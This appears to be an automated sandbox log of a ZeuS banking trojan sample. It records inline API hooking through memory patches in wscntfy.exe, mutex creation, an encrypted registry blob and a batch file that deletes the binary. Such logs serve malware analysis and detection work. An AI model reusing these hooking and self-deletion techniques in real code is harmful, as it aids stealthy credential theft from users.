Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: 1406 success or wait 2001919631
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: 1609 success or wait 2001920208
Memory allocated PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: E00000 Length: C0F47C Allocation Type: null Protection: page execute and read and write success or wait 2001920946
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: 7C90D1AE Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 2001921735
Memory read PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: 7C90D1AE Length: 30 Value: B8 35 00 00 00 BA 00 03 FE 7F FF 12 C2 20 00 90 B8 36 00 00 00 BA 00 03 FE 7F FF 12 C2 10 success or wait 2001922032
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: E00000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2001922341
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: E00000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2001922623
Memory written PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: E00000 Length: 10 Value: B8 35 00 00 00 E9 A9 D1 B0 7B success or wait 2001922952
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: 7C90D1AE Length: 1000 New Protection: page execute and read and write New Protection: page execute and write copy success or wait 2001923254
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: 7C90D000 Length: 1000 New Protection: page execute and write copy New Protection: page execute and write copy success or wait 2001923547
Memory written PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: 7C90D1AE Length: 5 Value: E9 33 B7 1D 84 success or wait 2001923875
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: 7C90D1AE Length: 1000 New Protection: page execute read New Protection: page execute and read and write success or wait 2001924188
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: 7C91632D Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 2001924955
Memory read PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: 7C91632D Length: 30 Value: 68 6C 02 00 00 68 80 64 91 7C E8 8F 85 FF FF A1 C8 E0 97 7C 89 45 E4 8B 45 08 89 85 B4 FD success or wait 2001925244
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: E0000A Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2001925548
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: E00000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2001925839
Memory written PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: E0000A Length: 10 Value: 68 6C 02 00 00 E9 1E 63 B1 7B success or wait 2001926171
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: 7C91632D Length: 1000 New Protection: page execute and read and write New Protection: page execute and write copy success or wait 2001926435
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: 7C916000 Length: 1000 New Protection: page execute and write copy New Protection: page execute and write copy success or wait 2001926726
Memory written PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: 7C91632D Length: 5 Value: E9 94 27 1D 84 success or wait 2001927050
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: 7C91632D Length: 1000 New Protection: page execute read New Protection: page execute and read and write success or wait 2001927359
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: 7C811195 Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 2001928051
Memory read PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: 7C811195 Length: 30 Value: 8B FF 55 8B EC 83 EC 64 83 7D 0C 01 56 57 0F 8D 13 AE 01 00 33 F6 39 75 0C 0F 8C 08 AE 01 success or wait 2001928339
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: E00014 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2001928644
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: E00000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2001928936
Memory written PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: E00014 Length: 10 Value: 8B FF 55 8B EC E9 7C 11 A1 7B success or wait 2001929268
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: 7C811195 Length: 1000 New Protection: page execute and read and write New Protection: page execute and write copy success or wait 2001929534
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: 7C811000 Length: 1000 New Protection: page execute and write copy New Protection: page execute and write copy success or wait 2001929825
Memory written PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: 7C811195 Length: 5 Value: E9 CE 79 2D 84 success or wait 2001930153
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: 7C811195 Length: 1000 New Protection: page execute read New Protection: page execute and read and write success or wait 2001930462
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: 3D94FABE Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 2001932087
Memory read PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: 3D94FABE Length: 30 Value: 8B FF 55 8B EC 51 51 53 56 33 DB 57 33 F6 33 FF 39 5D 08 89 5D FC 89 5D F8 0F 84 2A EB 03 success or wait 2001932376
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: E0001E Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2001932737
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: E00000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2001933031
Memory written PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: E0001E Length: 10 Value: 8B FF 55 8B EC E9 9B FA B4 3C success or wait 2001933365
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: 3D94FABE Length: 1000 New Protection: page execute and read and write New Protection: page execute and write copy success or wait 2001933631
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: 3D94F000 Length: 1000 New Protection: page execute and write copy New Protection: page execute and write copy success or wait 2001933926
Memory written PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: 3D94FABE Length: 5 Value: E9 97 45 1A C3 success or wait 2001934253
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: 3D94FABE Length: 1000 New Protection: page execute read New Protection: page execute and read and write success or wait 2001934563
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: 3D95EE89 Length: 1000 New Protection: page execute and read and write New Protection: page execute read success or wait 2001936027
Memory read PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: 3D95EE89 Length: 30 Value: 8B FF 55 8B EC 6A 10 6A 00 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 19 FD FE FF 5D success or wait 2001936316
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: E00028 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2001936670
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: E00000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2001936963
Memory written PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: E00028 Length: 10 Value: 8B FF 55 8B EC E9 5C EE B5 3C success or wait 2001937295
Memory written PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: 3D95EE89 Length: 5 Value: E9 20 52 19 C3 success or wait 2001938180
Memory read PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: 3D9BA6BF Length: 30 Value: 8B FF 55 8B EC 51 51 53 33 C0 21 45 FC 21 45 F8 56 57 33 FF 33 DB 33 C9 33 D2 39 45 08 75 success or wait 2001939414
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: E00000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2001940057
Memory written PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: E00032 Length: 10 Value: 8B FF 55 8B EC E9 88 A6 BB 3C success or wait 2001940388
Memory written PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: 3D9BA6BF Length: 5 Value: E9 3E 9A 13 C3 success or wait 2001941270
Memory read PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: 3D9BA666 Length: 30 Value: 8B FF 55 8B EC 53 56 57 33 DB 33 C9 33 D2 33 F6 33 FF 39 5D 10 75 2C 8B 45 0C 85 C0 74 14 success or wait 2001942495
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: E00000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2001943090
Memory written PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: E0003C Length: 10 Value: 8B FF 55 8B EC E9 25 A6 BB 3C success or wait 2001943423
Memory written PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: 3D9BA666 Length: 5 Value: E9 33 9B 13 C3 success or wait 2001944308
Memory read PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: 3D949088 Length: 30 Value: 8B FF 55 8B EC 51 51 53 56 57 33 DB 33 FF F6 05 78 11 9E 3D 01 89 5D FC 0F 84 D9 6A 01 00 success or wait 2001946488
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: E00000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2001947137
Memory written PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: E00046 Length: 10 Value: 8B FF 55 8B EC E9 3D 90 B4 3C success or wait 2001947471
Memory written PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: 3D949088 Length: 5 Value: E9 AD B1 1A C3 success or wait 2001948430
Memory read PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: 3D94654B Length: 30 Value: 8B FF 55 8B EC 83 EC 24 53 56 57 33 FF 39 3D B8 11 9E 3D 89 7D F4 89 7D F8 89 7D F0 C7 45 success or wait 2001950692
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: E00000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2001951339
Memory written PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: E00050 Length: 10 Value: 8B FF 55 8B EC E9 F6 64 B4 3C success or wait 2001951674
Memory written PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: 3D94654B Length: 5 Value: E9 2D DD 1A C3 success or wait 2001952558
Memory read PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: 3D963381 Length: 30 Value: 8B FF 55 8B EC 83 EC 20 53 33 DB 39 1D B8 11 9E 3D 56 57 89 5D FC 89 5D F4 89 5D F8 C7 45 success or wait 2001954645
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: E00000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2001955295
Memory written PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: E0005A Length: 10 Value: 8B FF 55 8B EC E9 22 33 B6 3C success or wait 2001955629
Memory written PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: 3D963381 Length: 5 Value: E9 36 0F 19 C3 success or wait 2001956509
Memory read PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: 3D94BF83 Length: 30 Value: 8B FF 55 8B EC 83 EC 10 53 33 DB 39 1D B8 11 9E 3D 56 57 89 5D FC C7 45 F8 01 00 00 00 0F success or wait 2001958713
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: E00000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2001959358
Memory written PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: E00064 Length: 10 Value: 8B FF 55 8B EC E9 1A BF B4 3C success or wait 2001959692
Memory written PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: 3D94BF83 Length: 5 Value: E9 7E 83 1A C3 success or wait 2001960579
Memory read PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: 3D94878D Length: 30 Value: 8B FF 55 8B EC 83 EC 10 53 33 DB 39 1D B8 11 9E 3D 56 57 89 5D F8 89 5D FC 0F 84 C3 65 04 success or wait 2001962792
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: E00000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2001963440
Memory written PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: E0006E Length: 10 Value: 8B FF 55 8B EC E9 1A 87 B4 3C success or wait 2001963775
Memory written PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: 3D94878D Length: 5 Value: E9 A0 BB 1A C3 success or wait 2001964665
Memory read PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: 71AB3E2B Length: 30 Value: 8B FF 55 8B EC 51 81 3D 50 40 AC 71 29 2C AB 71 56 0F 84 BC 4F 00 00 E8 3A E8 FF FF 85 C0 success or wait 2001965691
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: E00000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2001966340
Memory written PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: E00078 Length: 10 Value: 8B FF 55 8B EC E9 AE 3D CB 70 success or wait 2001966673
Memory read PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: 71AB4C27 Length: 30 Value: 8B FF 55 8B EC 83 EC 10 56 57 33 FF 81 3D 50 40 AC 71 29 2C AB 71 0F 84 25 6A 00 00 8D 45 success or wait 2001968734
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: E00000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2001969601
Memory read PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: 71AB68FA Length: 30 Value: 8B FF 55 8B EC 51 51 81 3D 50 40 AC 71 29 2C AB 71 56 0F 84 CD 4D 00 00 8D 45 F8 50 E8 98 success or wait 2001973201
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: E00000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2001973872
Memory read PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: 7E41ECA3 Length: 30 Value: B8 D7 11 00 00 BA 00 03 FE 7F FF 12 C2 0C 00 90 90 90 90 90 6A 2F 6A 01 E8 EE 97 FF FF 6A success or wait 2001976391
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: E00000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2001976989
Memory read PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: 7E41FE6E Length: 30 Value: B8 2E 12 00 00 BA 00 03 FE 7F FF 12 C2 04 00 33 FF 47 83 7D E4 FF 0F 85 AC AC FF FF C7 45 success or wait 2001979511
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: E00000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2001980111
Memory read PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: 7E428D20 Length: 30 Value: 6A 14 68 90 8D 42 7E E8 94 F8 FE FF E8 0B F9 FE FF 83 3D 8C 10 47 7E 00 75 08 85 C0 0F 84 success or wait 2001982582
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: E00000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2001983177
Memory read PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: 7E42C17E Length: 30 Value: 6A 14 68 F0 C1 42 7E E8 36 C4 FE FF E8 AD C4 FE FF 83 3D 8C 10 47 7E 00 75 08 85 C0 0F 84 success or wait 2001985638
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: E00000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2001986233
Memory read PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: 7E423D3A Length: 30 Value: 8B FF 55 8B EC 8B 4D 08 E8 99 47 FF FF 85 C0 74 11 6A 00 FF 75 14 FF 75 10 FF 75 0C 50 E8 success or wait 2001988717
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: E00000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2001989405
Memory read PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: 7E43E577 Length: 30 Value: 8B FF 55 8B EC 8B 4D 08 E8 5C 9F FD FF 85 C0 74 11 6A 01 FF 75 14 FF 75 10 FF 75 0C 50 E8 success or wait 2001991880
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: E00000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2001992480
Memory read PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: 7E430833 Length: 30 Value: 8B FF 55 8B EC 6A 00 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 09 00 00 00 5D C2 14 success or wait 2001994949
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: E00000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2001995544
Memory read PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: 7E44F965 Length: 30 Value: 8B FF 55 8B EC 6A 01 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 D7 0E FE FF 5D C2 14 success or wait 2001997774
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: E00000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2001998371
Memory read PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: 7E430A47 Length: 30 Value: 8B FF 55 8B EC 6A 00 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 09 00 00 00 5D C2 10 00 90 90 success or wait 2002000834
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: E00000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2002001428
Memory read PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: 7E44F9B4 Length: 30 Value: 8B FF 55 8B EC 6A 01 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 9C 10 FE FF 5D C2 10 00 90 90 success or wait 2002003613
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: E00000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2002004209
Memory read PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: 7E42A01E Length: 30 Value: 8B FF 55 8B EC 6A 00 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 89 FF FF FF 5D C2 14 success or wait 2002006713
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: E00000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2002007310
Memory read PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: 7E42A97D Length: 30 Value: 8B FF 55 8B EC 6A 01 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 2A F6 FF FF 5D C2 14 success or wait 2002009771
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: E00000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2002010363
Memory read PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: 7E41A39A Length: 30 Value: 8B FF 55 8B EC 83 EC 30 8B 45 08 56 57 6A 09 59 8D 70 04 8B 00 8D 7D D8 F3 A5 89 45 D4 33 success or wait 2002012790
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: E00000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2002013382
Memory read PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: 7E42EA5E Length: 30 Value: 8B FF 55 8B EC 83 EC 30 8B 45 08 56 57 6A 09 59 8D 70 04 8B 00 8D 7D D8 F3 A5 89 45 D4 33 success or wait 2002015844
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: E00000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2002016440
Memory read PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: 7E41AF7F Length: 30 Value: 8B FF 55 8B EC 8B 45 08 83 38 30 0F 85 0B E7 02 00 68 00 01 00 00 6A 00 6A 00 50 E8 C5 F1 success or wait 2002018922
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: E00000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2002019517
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: E00000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2002022518
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: E00000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2002025677
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: E00000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2002028985
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: E00000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2002032098
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: E00000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2002035120
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: E00000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2002038196
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: E00000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2002041278
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: E00000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2002044292
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: E00000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2002047385
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: E00000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2002050449
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: E00000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2002053463
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: E00000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2002056222
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: E00000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2002059280
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: E00000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2002062398
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: E00000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2002065433
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: E00000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2002068470
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: E00000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2002071482
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: E00000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2002074501
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: E00000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2002077502
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: E00000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2002080541
System info queried Type: ProcessInformation success or wait 2002090533
Section loaded Path: none Access: query and write and read Type: commit Baseaddress: E50000 Size: 12288 Protection: read write Mapped to pid: own pid success or wait 2002097424
Thread created PID: 236 TID: 2508 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\wscntfy.exe Injected: false success or wait 2002235694
Mutant created Name: \BaseNamedObjects\Local\{5B619F6A-A7F7-7417-185B-81F8EE8A3A3D} object name exists 2002237469
System info queried Type: ProcessInformation success or wait 2002238652
Section loaded Path: none Access: query and write and read Type: commit Baseaddress: E90000 Size: 12288 Protection: read write Mapped to pid: own pid success or wait 2002245461
Thread created PID: 236 TID: 2516 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\wscntfy.exe Injected: false success or wait 2002386461
Mutant created Name: \BaseNamedObjects\Global\{50BFCA5C-F2C1-7FC9-185B-81F8EE8A3A3D} success or wait 2002387723
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: Okmaykid success or wait 2002388241
Mutant created Name: \BaseNamedObjects\Local\{5B619F69-A7F4-7417-185B-81F8EE8A3A3D} object name exists 2002388986
Key value queried Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\WinSock2\Parameters Name: Okmaykid success or wait 2002389327
Key value set Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Giid Name: Okmaykid Type: Binary Data: 96 8D 31 C9 C5 75 08 F8 84 53 9B D1 F4 B9 61 28 10 B5 F1 08 71 3F 43 D6 C5 E1 62 1A C6 5B 19 DC CC D6 C6 9D C6 B3 0A 3C 08 2E 18 33 00 4D BE 0B 36 BD B7 A3 BD 92 EA 03 1F E4 1B C7 16 2B 45 CA B5 08 9E BA 6B 0D 91 DA 05 B1 6F 8F BD 44 64 5A BF 72 4F 66 A5 9E C5 70 A4 30 85 A9 DA E1 B0 C2 84 42 08 3E FA A7 EC BB C8 A3 E1 74 73 02 2C 20 4D 52 81 9C success or wait 2002391355
Analysis File: cmd.exe PID: 2536 Parent PID: 1960
+ Sections
+ General
Start time: 06:06:45
Start date: 01/12/2011
Path: C:\WINDOWS\system32\cmd.exe
Commandline: C:\WINDOWS\system32\cmd.exe /c C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpeded911e.bat
Imagebase: 0x4ad00000
File size: 389120 bytes
MD5 hash: 6D778E0F95447E6546553EEEA709D03C
File Activities:
+ File opened
File Path Access Options Content overwritten Completion Count Source Address
C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe read attributes and delete non directory file and open for backup ident and open reparse point success or wait 1 4AD17D07
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpeded911e.bat read attributes and delete non directory file and open for backup ident and open reparse point success or wait 1 4AD17D07
C:\Documents and Settings\Administrator\Application Data\Qiokze\pauz.dat read attributes and synchronize and generic read synchronous io non alert and non directory file false object name not found 1 1546EA
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpeded911e.bat read attributes and synchronize and generic read synchronous io non alert and non directory file false object name not found 1 4AD02F12
+ File read
File Path Offset Length Value Completion Count Source Address
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpeded911e.bat none 8192 40 65 63 68 6F 20 6F 66 66 0D 0A 3A 64 0D 0A 64 65 6C 20 22 43 3A 5C 5A 65 75 53 5F 62 69 6E 61 72 79 5F 66 62 36 35 31 30 34 63 63 64 32 63 61 36 36 34 34 39 36 32 33 34 64 33 66 32 63 32 61 33 37 31 2E 65 78 65 22 0D 0A 69 66 20 65 78 69 73 74 20 22 43 3A 5C 5A 65 75 53 5F 62 69 6E 61 72 79 5F 66 success or wait 1 4AD069F8
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpeded911e.bat none 8192 3A 64 0D 0A 64 65 6C 20 22 43 3A 5C 5A 65 75 53 5F 62 69 6E 61 72 79 5F 66 62 36 35 31 30 34 63 63 64 32 63 61 36 36 34 34 39 36 32 33 34 64 33 66 32 63 32 61 33 37 31 2E 65 78 65 22 0D 0A 69 66 20 65 78 69 73 74 20 22 43 3A 5C 5A 65 75 53 5F 62 69 6E 61 72 79 5F 66 62 36 35 31 30 34 63 63 64 32 63 success or wait 1 4AD069F8
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpeded911e.bat none 8192 64 65 6C 20 22 43 3A 5C 5A 65 75 53 5F 62 69 6E 61 72 79 5F 66 62 36 35 31 30 34 63 63 64 32 63 61 36 36 34 34 39 36 32 33 34 64 33 66 32 63 32 61 33 37 31 2E 65 78 65 22 0D 0A 69 66 20 65 78 69 73 74 20 22 43 3A 5C 5A 65 75 53 5F 62 69 6E 61 72 79 5F 66 62 36 35 31 30 34 63 63 64 32 63 61 36 36 34 success or wait 1 4AD069F8
